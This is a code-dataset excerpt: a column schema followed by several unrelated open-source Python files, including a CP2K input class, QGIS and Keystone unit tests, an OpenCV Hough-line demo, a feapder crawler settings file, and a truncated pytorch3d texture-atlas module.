blob_id
stringlengths
40
40
directory_id
stringlengths
40
40
path
stringlengths
3
616
content_id
stringlengths
40
40
detected_licenses
sequencelengths
0
112
license_type
stringclasses
2 values
repo_name
stringlengths
5
115
snapshot_id
stringlengths
40
40
revision_id
stringlengths
40
40
branch_name
stringclasses
777 values
visit_date
timestamp[us]date
2015-08-06 10:31:46
2023-09-06 10:44:38
revision_date
timestamp[us]date
1970-01-01 02:38:32
2037-05-03 13:00:00
committer_date
timestamp[us]date
1970-01-01 02:38:32
2023-09-06 01:08:06
github_id
int64
4.92k
681M
star_events_count
int64
0
209k
fork_events_count
int64
0
110k
gha_license_id
stringclasses
22 values
gha_event_created_at
timestamp[us]date
2012-06-04 01:52:49
2023-09-14 21:59:50
gha_created_at
timestamp[us]date
2008-05-22 07:58:19
2023-08-21 12:35:19
gha_language
stringclasses
149 values
src_encoding
stringclasses
26 values
language
stringclasses
1 value
is_vendor
bool
2 classes
is_generated
bool
2 classes
length_bytes
int64
3
10.2M
extension
stringclasses
188 values
content
stringlengths
3
10.2M
authors
sequencelengths
1
1
author_id
stringlengths
1
132
ae5f6a56b1dd9225cfb080b788cdc31d7483c321
f3bd271bf00325881fb5b2533b9ef7f7448a75ec
/xcp2k/classes/_mc1.py
fa05bea2ae6ea09939c9d07048036355cd040bf2
[]
no_license
obaica/xcp2k
7f99fc9d494859e16b9b0ea8e217b0493f4b2f59
6e15c2c95658f545102595dc1783f5e03a9e6916
refs/heads/master
2020-07-15T17:27:43.378835
2019-02-11T16:32:24
2019-02-11T16:32:24
null
0
0
null
null
null
null
UTF-8
Python
false
false
2,305
py
from xcp2k.inputsection import InputSection from _avbmc1 import _avbmc1 from _move_probabilities1 import _move_probabilities1 from _move_updates1 import _move_updates1 from _max_displacements1 import _max_displacements1 class _mc1(InputSection): def __init__(self): InputSection.__init__(self) self.Nstep = None self.Iprint = None self.Nmoves = None self.Nswapmoves = None self.Lbias = None self.Lstop = None self.Ldiscrete = None self.Rclus = None self.Restart = None self.Nvirial = None self.Ensemble = None self.Restart_file_name = None self.Moves_file_name = None self.Molecules_file_name = None self.Coordinate_file_name = None self.Energy_file_name = None self.Data_file_name = None self.Cell_file_name = None self.Max_disp_file_name = None self.Box2_file_name = None self.Pressure = None self.Temperature = None self.Virial_temps = None self.Discrete_step = None self.Eta = None self.Randomtoskip = None self.AVBMC = _avbmc1() self.MOVE_PROBABILITIES = _move_probabilities1() self.MOVE_UPDATES = _move_updates1() self.MAX_DISPLACEMENTS = _max_displacements1() self._name = "MC" self._keywords = {'Lstop': 'LSTOP', 'Nswapmoves': 'NSWAPMOVES', 'Lbias': 'LBIAS', 'Box2_file_name': 'BOX2_FILE_NAME', 'Nvirial': 'NVIRIAL', 'Ensemble': 'ENSEMBLE', 'Temperature': 'TEMPERATURE', 'Data_file_name': 'DATA_FILE_NAME', 'Pressure': 'PRESSURE', 'Restart': 'RESTART', 'Cell_file_name': 'CELL_FILE_NAME', 'Moves_file_name': 'MOVES_FILE_NAME', 'Iprint': 'IPRINT', 'Rclus': 'RCLUS', 'Eta': 'ETA', 'Molecules_file_name': 'MOLECULES_FILE_NAME', 'Virial_temps': 'VIRIAL_TEMPS', 'Randomtoskip': 'RANDOMTOSKIP', 'Max_disp_file_name': 'MAX_DISP_FILE_NAME', 'Restart_file_name': 'RESTART_FILE_NAME', 'Coordinate_file_name': 'COORDINATE_FILE_NAME', 'Nmoves': 'NMOVES', 'Discrete_step': 'DISCRETE_STEP', 'Energy_file_name': 'ENERGY_FILE_NAME', 'Ldiscrete': 'LDISCRETE', 'Nstep': 'NSTEP'} self._subsections = {'AVBMC': 'AVBMC', 'MOVE_UPDATES': 'MOVE_UPDATES', 'MAX_DISPLACEMENTS': 'MAX_DISPLACEMENTS', 'MOVE_PROBABILITIES': 'MOVE_PROBABILITIES'}
57abb1d492da22ca8039ba1f34f17f15d3e3ae53
de626f1892619968efbaa22ea26079ee2269e799
/test/test_Master_dialog.py
02100573c7b18bcfb48fb78df5fb2f3d2c296df2
[]
no_license
gerardoros/CartograficoQgisPlugin
7e8724cec0469d0494090b3557e9d4e967935121
844fa1052f435478e2e946099d7dbd6b1b97c311
refs/heads/master
2023-04-04T08:06:30.967894
2021-04-07T14:15:37
2021-04-07T14:15:37
null
0
0
null
null
null
null
UTF-8
Python
false
false
1,479
py
# coding=utf-8 """Dialog test. .. note:: This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. """ __author__ = 'Master' __date__ = '2018-04-27' __copyright__ = 'Copyright 2018, Master' import unittest from PyQt5.QtGui import QDialogButtonBox, QDialog from Master_dialog import MasterDialog from utilities import get_qgis_app QGIS_APP = get_qgis_app() class MasterDialogTest(unittest.TestCase): """Test dialog works.""" def setUp(self): """Runs before each test.""" self.dialog = MasterDialog(None) def tearDown(self): """Runs after each test.""" self.dialog = None def test_dialog_ok(self): """Test we can click OK.""" button = self.dialog.button_box.button(QDialogButtonBox.Ok) button.click() result = self.dialog.result() self.assertEqual(result, QDialog.Accepted) def test_dialog_cancel(self): """Test we can click cancel.""" button = self.dialog.button_box.button(QDialogButtonBox.Cancel) button.click() result = self.dialog.result() self.assertEqual(result, QDialog.Rejected) if __name__ == "__main__": suite = unittest.makeSuite(MasterDialogTest) runner = unittest.TextTestRunner(verbosity=2) runner.run(suite)
a96cb429f9ca4140e68c19d023448121c5c2e1c3
3ac84fa46db498e914f6e1aaf2eff490a63807a1
/devstack/python-keystoneclient/keystoneclient/tests/auth/test_identity_common.py
4a0cf572983e9f76f36dece4f158b8966f464bf9
[ "Apache-2.0", "BSD-2-Clause" ]
permissive
onsoku/horizon_review
3c5f1a8f863142f3f724f59771ad39604bca4c20
80cca0badc61b4754ef2c10f23a0ee48cd227445
refs/heads/master
2020-05-20T11:11:25.625186
2015-01-21T01:01:59
2015-01-21T01:01:59
29,002,325
1
0
null
null
null
null
UTF-8
Python
false
false
12,422
py
# Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. import abc import datetime import uuid from oslo.utils import timeutils import six from keystoneclient import access from keystoneclient.auth import base from keystoneclient.auth.identity import v2 from keystoneclient.auth.identity import v3 from keystoneclient import fixture from keystoneclient import session from keystoneclient.tests import utils @six.add_metaclass(abc.ABCMeta) class CommonIdentityTests(object): TEST_ROOT_URL = 'http://127.0.0.1:5000/' TEST_ROOT_ADMIN_URL = 'http://127.0.0.1:35357/' TEST_COMPUTE_PUBLIC = 'http://nova/novapi/public' TEST_COMPUTE_INTERNAL = 'http://nova/novapi/internal' TEST_COMPUTE_ADMIN = 'http://nova/novapi/admin' TEST_PASS = uuid.uuid4().hex def setUp(self): super(CommonIdentityTests, self).setUp() self.TEST_URL = '%s%s' % (self.TEST_ROOT_URL, self.version) self.TEST_ADMIN_URL = '%s%s' % (self.TEST_ROOT_ADMIN_URL, self.version) self.TEST_DISCOVERY = fixture.DiscoveryList(href=self.TEST_ROOT_URL) self.stub_auth_data() @abc.abstractmethod def create_auth_plugin(self, **kwargs): """Create an auth plugin that makes sense for the auth data. It doesn't really matter what auth mechanism is used but it should be appropriate to the API version. """ @abc.abstractmethod def get_auth_data(self, **kwargs): """Return fake authentication data. This should register a valid token response and ensure that the compute endpoints are set to TEST_COMPUTE_PUBLIC, _INTERNAL and _ADMIN. """ def stub_auth_data(self, **kwargs): token = self.get_auth_data(**kwargs) self.stub_auth(json=token) @abc.abstractproperty def version(self): """The API version being tested.""" def test_discovering(self): self.stub_url('GET', [], base_url=self.TEST_COMPUTE_ADMIN, json=self.TEST_DISCOVERY) body = 'SUCCESS' # which gives our sample values self.stub_url('GET', ['path'], text=body) a = self.create_auth_plugin() s = session.Session(auth=a) resp = s.get('/path', endpoint_filter={'service_type': 'compute', 'interface': 'admin', 'version': self.version}) self.assertEqual(200, resp.status_code) self.assertEqual(body, resp.text) new_body = 'SC SUCCESS' # if we don't specify a version, we use the URL from the SC self.stub_url('GET', ['path'], base_url=self.TEST_COMPUTE_ADMIN, text=new_body) resp = s.get('/path', endpoint_filter={'service_type': 'compute', 'interface': 'admin'}) self.assertEqual(200, resp.status_code) self.assertEqual(new_body, resp.text) def test_discovery_uses_session_cache(self): # register responses such that if the discovery URL is hit more than # once then the response will be invalid and not point to COMPUTE_ADMIN resps = [{'json': self.TEST_DISCOVERY}, {'status_code': 500}] self.requests.register_uri('GET', self.TEST_COMPUTE_ADMIN, resps) body = 'SUCCESS' self.stub_url('GET', ['path'], text=body) # now either of the two plugins I use, it should not cause a second # request to the discovery url. s = session.Session() a = self.create_auth_plugin() b = self.create_auth_plugin() for auth in (a, b): resp = s.get('/path', auth=auth, endpoint_filter={'service_type': 'compute', 'interface': 'admin', 'version': self.version}) self.assertEqual(200, resp.status_code) self.assertEqual(body, resp.text) def test_discovery_uses_plugin_cache(self): # register responses such that if the discovery URL is hit more than # once then the response will be invalid and not point to COMPUTE_ADMIN resps = [{'json': self.TEST_DISCOVERY}, {'status_code': 500}] self.requests.register_uri('GET', self.TEST_COMPUTE_ADMIN, resps) body = 'SUCCESS' self.stub_url('GET', ['path'], text=body) # now either of the two sessions I use, it should not cause a second # request to the discovery url. sa = session.Session() sb = session.Session() auth = self.create_auth_plugin() for sess in (sa, sb): resp = sess.get('/path', auth=auth, endpoint_filter={'service_type': 'compute', 'interface': 'admin', 'version': self.version}) self.assertEqual(200, resp.status_code) self.assertEqual(body, resp.text) def test_discovering_with_no_data(self): # which returns discovery information pointing to TEST_URL but there is # no data there. self.stub_url('GET', [], base_url=self.TEST_COMPUTE_ADMIN, status_code=400) # so the url that will be used is the same TEST_COMPUTE_ADMIN body = 'SUCCESS' self.stub_url('GET', ['path'], base_url=self.TEST_COMPUTE_ADMIN, text=body, status_code=200) a = self.create_auth_plugin() s = session.Session(auth=a) resp = s.get('/path', endpoint_filter={'service_type': 'compute', 'interface': 'admin', 'version': self.version}) self.assertEqual(200, resp.status_code) self.assertEqual(body, resp.text) def test_asking_for_auth_endpoint_ignores_checks(self): a = self.create_auth_plugin() s = session.Session(auth=a) auth_url = s.get_endpoint(service_type='compute', interface=base.AUTH_INTERFACE) self.assertEqual(self.TEST_URL, auth_url) def _create_expired_auth_plugin(self, **kwargs): expires = timeutils.utcnow() - datetime.timedelta(minutes=20) expired_token = self.get_auth_data(expires=expires) expired_auth_ref = access.AccessInfo.factory(body=expired_token) body = 'SUCCESS' self.stub_url('GET', ['path'], base_url=self.TEST_COMPUTE_ADMIN, text=body) a = self.create_auth_plugin(**kwargs) a.auth_ref = expired_auth_ref return a def test_reauthenticate(self): a = self._create_expired_auth_plugin() expired_auth_ref = a.auth_ref s = session.Session(auth=a) self.assertIsNot(expired_auth_ref, a.get_access(s)) def test_no_reauthenticate(self): a = self._create_expired_auth_plugin(reauthenticate=False) expired_auth_ref = a.auth_ref s = session.Session(auth=a) self.assertIs(expired_auth_ref, a.get_access(s)) def test_invalidate(self): a = self.create_auth_plugin() s = session.Session(auth=a) # trigger token fetching s.get_token() self.assertTrue(a.auth_ref) self.assertTrue(a.invalidate()) self.assertIsNone(a.auth_ref) self.assertFalse(a.invalidate()) class V3(CommonIdentityTests, utils.TestCase): @property def version(self): return 'v3' def get_auth_data(self, **kwargs): token = fixture.V3Token(**kwargs) region = 'RegionOne' svc = token.add_service('identity') svc.add_standard_endpoints(admin=self.TEST_ADMIN_URL, region=region) svc = token.add_service('compute') svc.add_standard_endpoints(admin=self.TEST_COMPUTE_ADMIN, public=self.TEST_COMPUTE_PUBLIC, internal=self.TEST_COMPUTE_INTERNAL, region=region) return token def stub_auth(self, subject_token=None, **kwargs): if not subject_token: subject_token = self.TEST_TOKEN kwargs.setdefault('headers', {})['X-Subject-Token'] = subject_token self.stub_url('POST', ['auth', 'tokens'], **kwargs) def create_auth_plugin(self, **kwargs): kwargs.setdefault('auth_url', self.TEST_URL) kwargs.setdefault('username', self.TEST_USER) kwargs.setdefault('password', self.TEST_PASS) return v3.Password(**kwargs) class V2(CommonIdentityTests, utils.TestCase): @property def version(self): return 'v2.0' def create_auth_plugin(self, **kwargs): kwargs.setdefault('auth_url', self.TEST_URL) kwargs.setdefault('username', self.TEST_USER) kwargs.setdefault('password', self.TEST_PASS) return v2.Password(**kwargs) def get_auth_data(self, **kwargs): token = fixture.V2Token(**kwargs) region = 'RegionOne' svc = token.add_service('identity') svc.add_endpoint(self.TEST_ADMIN_URL, region=region) svc = token.add_service('compute') svc.add_endpoint(public=self.TEST_COMPUTE_PUBLIC, internal=self.TEST_COMPUTE_INTERNAL, admin=self.TEST_COMPUTE_ADMIN, region=region) return token def stub_auth(self, **kwargs): self.stub_url('POST', ['tokens'], **kwargs) class CatalogHackTests(utils.TestCase): TEST_URL = 'http://keystone.server:5000/v2.0' OTHER_URL = 'http://other.server:5000/path' IDENTITY = 'identity' BASE_URL = 'http://keystone.server:5000/' V2_URL = BASE_URL + 'v2.0' V3_URL = BASE_URL + 'v3' def test_getting_endpoints(self): disc = fixture.DiscoveryList(href=self.BASE_URL) self.stub_url('GET', ['/'], base_url=self.BASE_URL, json=disc) token = fixture.V2Token() service = token.add_service(self.IDENTITY) service.add_endpoint(public=self.V2_URL, admin=self.V2_URL, internal=self.V2_URL) self.stub_url('POST', ['tokens'], base_url=self.V2_URL, json=token) v2_auth = v2.Password(self.V2_URL, username=uuid.uuid4().hex, password=uuid.uuid4().hex) sess = session.Session(auth=v2_auth) endpoint = sess.get_endpoint(service_type=self.IDENTITY, interface='public', version=(3, 0)) self.assertEqual(self.V3_URL, endpoint) def test_returns_original_when_discover_fails(self): token = fixture.V2Token() service = token.add_service(self.IDENTITY) service.add_endpoint(public=self.V2_URL, admin=self.V2_URL, internal=self.V2_URL) self.stub_url('POST', ['tokens'], base_url=self.V2_URL, json=token) self.stub_url('GET', [], base_url=self.BASE_URL, status_code=404) v2_auth = v2.Password(self.V2_URL, username=uuid.uuid4().hex, password=uuid.uuid4().hex) sess = session.Session(auth=v2_auth) endpoint = sess.get_endpoint(service_type=self.IDENTITY, interface='public', version=(3, 0)) self.assertEqual(self.V2_URL, endpoint)
20753a5eec6cbef1d2f88ca4dca223a00463326f
ef9dfb78938ecf500f2378a84eca8051255a836c
/star-travel/venv/bin/pycodestyle
93fb5f501bc9e2c6985163ea18cf05d0f8008eee
[]
no_license
lesage20/djangoinitiation
cd11ed6a1cb16356075f4af3be8a93db31ba8c9f
818e3593d16c1fac5b2741605a4675d7833c18b2
refs/heads/master
2021-02-16T18:24:02.846455
2020-03-11T04:44:24
2020-03-11T04:44:24
245,033,422
0
0
null
null
null
null
UTF-8
Python
false
false
247
#!/Users/nan/Desktop/star-travel/venv/bin/python3 # -*- coding: utf-8 -*- import re import sys from pycodestyle import _main if __name__ == '__main__': sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0]) sys.exit(_main())
9eb258cdc6b65a9919a795440b6beb5e84713442
bdd40ea113fdf2f04ef7d61a096a575322928d1d
/Rupesh/opencv/Opencv_Python/Probabilistic_hough_line_L4_6.py
dd657873e7607cacae08499456287fe764d0fb17
[]
no_license
rupesh7399/rupesh
3eebf924d33790c29636ad59433e10444b74bc2f
9b746acf37ab357c147cdada1de5458c5fc64f53
refs/heads/master
2020-12-22T05:01:29.176696
2020-03-03T10:32:36
2020-03-03T10:32:36
202,111,967
0
0
null
null
null
null
UTF-8
Python
false
false
666
py
import cv2 import numpy as np # Grayscale and Canny Edges extracted image = cv2.imread('images/soduku.jpg') gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY) edges = cv2.Canny(gray, 100, 170, apertureSize = 3) # Again we use the same rho and theta accuracies # However, we specific a minimum vote (pts along line) of 100 # and Min line length of 5 pixels and max gap between lines of 10 pixels lines = cv2.HoughLinesP(edges, 1, np.pi / 180, 200, 5, 10) print(lines.shape) for line in lines: for x1,y1,x2,y2 in line: cv2.line(image, (x1, y1), (x2, y2),(0, 255, 0), 3) cv2.imshow('Probabilistic Hough Lines', image) cv2.waitKey(0) cv2.destroyAllWindows()
700d87cb74a2cd087f84aba3b9e72437ec8f0300
8dbb7d4a57a29550568ea9b005ade6542bb546fd
/baidu-spider/setting.py
6b7cf57e85f3e0f1b010ad7af1e0b45f29d2f094
[]
no_license
kalicc/feapder_project
96e4b0d575d61967fff445d62267abe0d1b0d7af
19820eb7da8f9cec32a11bdcfc47232917743896
refs/heads/master
2023-08-05T00:44:36.822548
2021-09-24T10:02:53
2021-09-24T10:02:53
null
0
0
null
null
null
null
UTF-8
Python
false
false
5,628
py
# -*- coding: utf-8 -*- """爬虫配置文件""" # import os # import sys # # MYSQL MYSQL_IP = "localhost" MYSQL_PORT = 3306 MYSQL_DB = "feapder" MYSQL_USER_NAME = "feapder" MYSQL_USER_PASS = "feapder123" # # # MONGODB # MONGO_IP = os.getenv("MONGO_IP", "localhost") # MONGO_PORT = int(os.getenv("MONGO_PORT", 27017)) # MONGO_DB = os.getenv("MONGO_DB") # MONGO_USER_NAME = os.getenv("MONGO_USER_NAME") # MONGO_USER_PASS = os.getenv("MONGO_USER_PASS") # # REDIS # ip:port 多个可写为列表或者逗号隔开 如 ip1:port1,ip2:port2 或 ["ip1:port1", "ip2:port2"] REDISDB_IP_PORTS = "localhost:6379" # REDISDB_USER_PASS = os.getenv("REDISDB_USER_PASS") # # 默认 0 到 15 共16个数据库 # REDISDB_DB = int(os.getenv("REDISDB_DB", 0)) # # 适用于redis哨兵模式 # REDISDB_SERVICE_NAME = os.getenv("REDISDB_SERVICE_NAME") # # # 数据入库的pipeline,可自定义,默认MysqlPipeline # ITEM_PIPELINES = [ # "feapder.pipelines.mysql_pipeline.MysqlPipeline", # # "feapder.pipelines.mongo_pipeline.MongoPipeline", # ] # # # 爬虫相关 # # COLLECTOR # COLLECTOR_SLEEP_TIME = 1 # 从任务队列中获取任务到内存队列的间隔 # COLLECTOR_TASK_COUNT = 10 # 每次获取任务数量 # # # SPIDER # SPIDER_THREAD_COUNT = 1 # 爬虫并发数 # SPIDER_SLEEP_TIME = 0 # 下载时间间隔 单位秒。 支持随机 如 SPIDER_SLEEP_TIME = [2, 5] 则间隔为 2~5秒之间的随机数,包含2和5 # SPIDER_TASK_COUNT = 1 # 每个parser从内存队列中获取任务的数量 # SPIDER_MAX_RETRY_TIMES = 100 # 每个请求最大重试次数 # AUTO_STOP_WHEN_SPIDER_DONE = True # 爬虫是否自动结束 # # # 浏览器渲染 # WEBDRIVER = dict( # pool_size=1, # 浏览器的数量 # load_images=True, # 是否加载图片 # user_agent=None, # 字符串 或 无参函数,返回值为user_agent # proxy=None, # xxx.xxx.xxx.xxx:xxxx 或 无参函数,返回值为代理地址 # headless=False, # 是否为无头浏览器 # driver_type="CHROME", # CHROME、PHANTOMJS、FIREFOX # timeout=30, # 请求超时时间 # window_size=(1024, 800), # 窗口大小 # executable_path=None, # 浏览器路径,默认为默认路径 # render_time=0, # 渲染时长,即打开网页等待指定时间后再获取源码 # custom_argument=["--ignore-certificate-errors"], # 自定义浏览器渲染参数 # ) # # # 爬虫启动时,重新抓取失败的requests # RETRY_FAILED_REQUESTS = False # # 保存失败的request # SAVE_FAILED_REQUEST = True # # request防丢机制。(指定的REQUEST_LOST_TIMEOUT时间内request还没做完,会重新下发 重做) # REQUEST_LOST_TIMEOUT = 600 # 10分钟 # # request网络请求超时时间 # REQUEST_TIMEOUT = 22 # 等待服务器响应的超时时间,浮点数,或(connect timeout, read timeout)元组 # # # 下载缓存 利用redis缓存,但由于内存大小限制,所以建议仅供开发调试代码时使用,防止每次debug都需要网络请求 # RESPONSE_CACHED_ENABLE = False # 是否启用下载缓存 成本高的数据或容易变需求的数据,建议设置为True # RESPONSE_CACHED_EXPIRE_TIME = 3600 # 缓存时间 秒 # RESPONSE_CACHED_USED = False # 是否使用缓存 补采数据时可设置为True # # # 设置代理 # PROXY_EXTRACT_API = None # 代理提取API ,返回的代理分割符为\r\n # PROXY_ENABLE = True # # # 随机headers # RANDOM_HEADERS = True # # UserAgent类型 支持 'chrome', 'opera', 'firefox', 'internetexplorer', 'safari',若不指定则随机类型 # USER_AGENT_TYPE = "chrome" # # 默认使用的浏览器头 RANDOM_HEADERS=True时不生效 # DEFAULT_USERAGENT = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36" # # requests 使用session # USE_SESSION = False # # # 去重 # ITEM_FILTER_ENABLE = False # item 去重 # REQUEST_FILTER_ENABLE = False # request 去重 # # # 报警 支持钉钉、企业微信、邮件 # # 钉钉报警 # DINGDING_WARNING_URL = "" # 钉钉机器人api # DINGDING_WARNING_PHONE = "" # 报警人 支持列表,可指定多个 # # 邮件报警 # EMAIL_SENDER = "" # 发件人 # EMAIL_PASSWORD = "" # 授权码 # EMAIL_RECEIVER = "" # 收件人 支持列表,可指定多个 # EMAIL_SMTPSERVER = "smtp.163.com" # 邮件服务器 默认为163邮箱 # # 企业微信报警 # WECHAT_WARNING_URL = "" # 企业微信机器人api # WECHAT_WARNING_PHONE = "" # 报警人 将会在群内@此人, 支持列表,可指定多人 # WECHAT_WARNING_ALL = False # 是否提示所有人, 默认为False # # 时间间隔 # WARNING_INTERVAL = 3600 # 相同报警的报警时间间隔,防止刷屏; 0表示不去重 # WARNING_LEVEL = "DEBUG" # 报警级别, DEBUG / ERROR # WARNING_FAILED_COUNT = 1000 # 任务失败数 超过WARNING_FAILED_COUNT则报警 # # LOG_NAME = os.path.basename(os.getcwd()) # LOG_PATH = "log/%s.log" % LOG_NAME # log存储路径 # LOG_LEVEL = "DEBUG" # LOG_COLOR = True # 是否带有颜色 # LOG_IS_WRITE_TO_CONSOLE = True # 是否打印到控制台 # LOG_IS_WRITE_TO_FILE = False # 是否写文件 # LOG_MODE = "w" # 写文件的模式 # LOG_MAX_BYTES = 10 * 1024 * 1024 # 每个日志文件的最大字节数 # LOG_BACKUP_COUNT = 20 # 日志文件保留数量 # LOG_ENCODING = "utf8" # 日志文件编码 # OTHERS_LOG_LEVAL = "ERROR" # 第三方库的log等级 # # # 切换工作路径为当前项目路径 # project_path = os.path.abspath(os.path.dirname(__file__)) # os.chdir(project_path) # 切换工作路经 # sys.path.insert(0, project_path) # print('当前工作路径为 ' + os.getcwd())
c624db327e351b58c163be9c5581a3b6da482442
cc75f278846363dfa23d35e0a580cf2bfde700d1
/pytorch3d/io/mtl_io.py
f194b976b437de447635a34d0df6897064ca736f
[ "BSD-3-Clause" ]
permissive
2429581027/pytorch3d
78a0da94484f09f778a867d897e38905f355b60f
5d65a0cf8c9a1fb755fd09ce098bcedb0c670d80
refs/heads/master
2022-12-25T12:42:44.861890
2020-10-06T22:53:45
2020-10-06T22:55:05
null
0
0
null
null
null
null
UTF-8
Python
false
false
19,197
py
# Copyright (c) Facebook, Inc. and its affiliates. All rights reserved. """This module implements utility functions for loading .mtl files and textures.""" import os import warnings from typing import Dict, List, Optional, Tuple import numpy as np import torch import torch.nn.functional as F from pytorch3d.io.utils import _open_file, _read_image def make_mesh_texture_atlas( material_properties: Dict, texture_images: Dict, face_material_names, faces_verts_uvs: torch.Tensor, texture_size: int, texture_wrap: Optional[str], ) -> torch.Tensor: """ Given properties for materials defined in the .mtl file, and the face texture uv coordinates, construct an (F, R, R, 3) texture atlas where R is the texture_size and F is the number of faces in the mesh. Args: material_properties: dict of properties for each material. If a material does not have any properties it will have an emtpy dict. texture_images: dict of material names and texture images face_material_names: numpy array of the material name corresponding to each face. Faces which don't have an associated material will be an empty string. For these faces, a uniform white texture is assigned. faces_verts_uvs: LongTensor of shape (F, 3, 2) giving the uv coordinates for each vertex in the face. texture_size: the resolution of the per face texture map returned by this function. Each face will have a texture map of shape (texture_size, texture_size, 3). texture_wrap: string, one of ["repeat", "clamp", None] If `texture_wrap="repeat"` for uv values outside the range [0, 1] the integer part is ignored and a repeating pattern is formed. If `texture_wrap="clamp"` the values are clamped to the range [0, 1]. If None, do nothing. Returns: atlas: FloatTensor of shape (F, texture_size, texture_size, 3) giving the per face texture map. """ # Create an R x R texture map per face in the mesh R = texture_size F = faces_verts_uvs.shape[0] # Initialize the per face texture map to a white color. # TODO: allow customization of this base color? # pyre-fixme[16]: `Tensor` has no attribute `new_ones`. atlas = faces_verts_uvs.new_ones(size=(F, R, R, 3)) # Check for empty materials. if not material_properties and not texture_images: return atlas if texture_wrap == "repeat": # If texture uv coordinates are outside the range [0, 1] follow # the convention GL_REPEAT in OpenGL i.e the integer part of the coordinate # will be ignored and a repeating pattern is formed. # Shapenet data uses this format see: # https://shapenet.org/qaforum/index.php?qa=15&qa_1=why-is-the-texture-coordinate-in-the-obj-file-not-in-the-range # noqa: B950 # pyre-fixme[16]: `ByteTensor` has no attribute `any`. if (faces_verts_uvs > 1).any() or (faces_verts_uvs < 0).any(): msg = "Texture UV coordinates outside the range [0, 1]. \ The integer part will be ignored to form a repeating pattern." warnings.warn(msg) # pyre-fixme[9]: faces_verts_uvs has type `Tensor`; used as `int`. # pyre-fixme[58]: `%` is not supported for operand types `Tensor` and `int`. faces_verts_uvs = faces_verts_uvs % 1 elif texture_wrap == "clamp": # Clamp uv coordinates to the [0, 1] range. faces_verts_uvs = faces_verts_uvs.clamp(0.0, 1.0) # Iterate through the material properties - not # all materials have texture images so this has to be # done separately to the texture interpolation. for material_name, props in material_properties.items(): # Bool to indicate which faces use this texture map. faces_material_ind = torch.from_numpy(face_material_names == material_name).to( faces_verts_uvs.device ) if faces_material_ind.sum() > 0: # For these faces, update the base color to the # diffuse material color. if "diffuse_color" not in props: continue atlas[faces_material_ind, ...] = props["diffuse_color"][None, :] # Iterate through the materials used in this mesh. Update the # texture atlas for the faces which use this material. # Faces without texture are white. for material_name, image in list(texture_images.items()): # Only use the RGB colors if image.shape[2] == 4: image = image[:, :, :3] # Reverse the image y direction image = torch.flip(image, [0]).type_as(faces_verts_uvs) # Bool to indicate which faces use this texture map. faces_material_ind = torch.from_numpy(face_material_names == material_name).to( faces_verts_uvs.device ) # Find the subset of faces which use this texture with this texture image uvs_subset = faces_verts_uvs[faces_material_ind, :, :] # Update the texture atlas for the faces which use this texture. # TODO: should the texture map values be multiplied # by the diffuse material color (i.e. use *= as the atlas has # been initialized to the diffuse color)?. This is # not being done in SoftRas. atlas[faces_material_ind, :, :] = make_material_atlas(image, uvs_subset, R) return atlas def make_material_atlas( image: torch.Tensor, faces_verts_uvs: torch.Tensor, texture_size: int ) -> torch.Tensor: r""" Given a single texture image and the uv coordinates for all the face vertices, create a square texture map per face using the formulation from [1]. For a triangle with vertices (v0, v1, v2) we can create a barycentric coordinate system with the x axis being the vector (v0 - v2) and the y axis being the vector (v1 - v2). The barycentric coordinates range from [0, 1] in the +x and +y direction so this creates a triangular texture space with vertices at (0, 1), (0, 0) and (1, 0). The per face texture map is of shape (texture_size, texture_size, 3) which is a square. To map a triangular texture to a square grid, each triangle is parametrized as follows (e.g. R = texture_size = 3): The triangle texture is first divided into RxR = 9 subtriangles which each map to one grid cell. The numbers in the grid cells and triangles show the mapping. ..code-block::python Triangular Texture Space: 1 |\ |6 \ |____\ |\ 7 |\ |3 \ |4 \ |____\|____\ |\ 8 |\ 5 |\ |0 \ |1 \ |2 \ |____\|____\|____\ 0 1 Square per face texture map: R ____________________ | | | | | 6 | 7 | 8 | |______|______|______| | | | | | 3 | 4 | 5 | |______|______|______| | | | | | 0 | 1 | 2 | |______|______|______| 0 R The barycentric coordinates of each grid cell are calculated using the xy coordinates: ..code-block::python The cartesian coordinates are: Grid 1: R ____________________ | | | | | 20 | 21 | 22 | |______|______|______| | | | | | 10 | 11 | 12 | |______|______|______| | | | | | 00 | 01 | 02 | |______|______|______| 0 R where 02 means y = 0, x = 2 Now consider this subset of the triangle which corresponds to grid cells 0 and 8: ..code-block::python 1/R ________ |\ 8 | | \ | | 0 \ | |_______\| 0 1/R The centroids of the triangles are: 0: (1/3, 1/3) * 1/R 8: (2/3, 2/3) * 1/R For each grid cell we can now calculate the centroid `(c_y, c_x)` of the corresponding texture triangle: - if `(x + y) < R`, then offsett the centroid of triangle 0 by `(y, x) * (1/R)` - if `(x + y) > R`, then offset the centroid of triangle 8 by `((R-1-y), (R-1-x)) * (1/R)`. This is equivalent to updating the portion of Grid 1 above the diagnonal, replacing `(y, x)` with `((R-1-y), (R-1-x))`: ..code-block::python R _____________________ | | | | | 20 | 01 | 00 | |______|______|______| | | | | | 10 | 11 | 10 | |______|______|______| | | | | | 00 | 01 | 02 | |______|______|______| 0 R The barycentric coordinates (w0, w1, w2) are then given by: ..code-block::python w0 = c_x w1 = c_y w2 = 1- w0 - w1 Args: image: FloatTensor of shape (H, W, 3) faces_verts_uvs: uv coordinates for each vertex in each face (F, 3, 2) texture_size: int Returns: atlas: a FloatTensor of shape (F, texture_size, texture_size, 3) giving a per face texture map. [1] Liu et al, 'Soft Rasterizer: A Differentiable Renderer for Image-based 3D Reasoning', ICCV 2019 """ R = texture_size device = faces_verts_uvs.device rng = torch.arange(R, device=device) # Meshgrid returns (row, column) i.e (Y, X) # Change order to (X, Y) to make the grid. Y, X = torch.meshgrid(rng, rng) # pyre-fixme[28]: Unexpected keyword argument `axis`. grid = torch.stack([X, Y], axis=-1) # (R, R, 2) # Grid cells below the diagonal: x + y < R. below_diag = grid.sum(-1) < R # map a [0, R] grid -> to a [0, 1] barycentric coordinates of # the texture triangle centroids. bary = torch.zeros((R, R, 3), device=device) # 